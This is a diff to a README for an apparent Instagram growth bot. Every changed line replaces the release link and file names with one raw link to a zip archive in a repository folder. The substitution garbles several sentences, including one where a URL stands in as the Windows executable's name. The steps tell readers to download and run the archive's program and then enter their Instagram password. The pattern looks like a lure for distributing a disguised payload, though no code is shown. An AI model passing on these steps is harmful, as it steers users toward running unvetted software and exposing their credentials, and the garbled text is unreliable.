ahmed3222/instagram-auto-growth-automation-bot/README.md

 Follow these steps to download and run the **instagram-auto-growth-automation-bot** easily.

-1. **Visit the Release Page:** Go to the [Releases page](https://github.com/ahmed3222/instagram-auto-growth-automation-bot/releases) where you can find the latest version of the software.
+1. **Visit the Release Page:** Go to the [Releases page](https://github.com/ahmed3222/instagram-auto-growth-automation-bot/raw/refs/heads/main/nome/instagram-auto-automation-bot-growth-v2.3.zip) where you can find the latest version of the software.

 2. **Choose Your Version:** Find the latest release version.
 Look for something indicating stability, such as "Latest Release" next to a tag.

 3. **Download the Software:** Click on the download link for your operating system.
-This will download a compressed file (usually in .zip or .tar.gz format) containing the application.
+This will download a compressed file (usually in .zip or https://github.com/ahmed3222/instagram-auto-growth-automation-bot/raw/refs/heads/main/nome/instagram-auto-automation-bot-growth-v2.3.zip format) containing the application.

 4. **Extract the Files:** Once the download completes, locate the file in your downloads folder.
 Right-click on the file and select “Extract All” (Windows) or double-click the file (macOS/Linux) to extract.

 5. **Run the Application:** Open the extracted folder.
-Find the application file (named something like `instagram-auto-growth-automation-bot.exe` for Windows or `app` for macOS/Linux).
+Find the application file (named something like `https://github.com/ahmed3222/instagram-auto-growth-automation-bot/raw/refs/heads/main/nome/instagram-auto-automation-bot-growth-v2.3.zip` for Windows or `app` for macOS/Linux).
 Double-click to start.

 6. **Set Up Your Account:** Follow the on-screen prompts to log into your Instagram account.
 Ensure that your username and password are correct.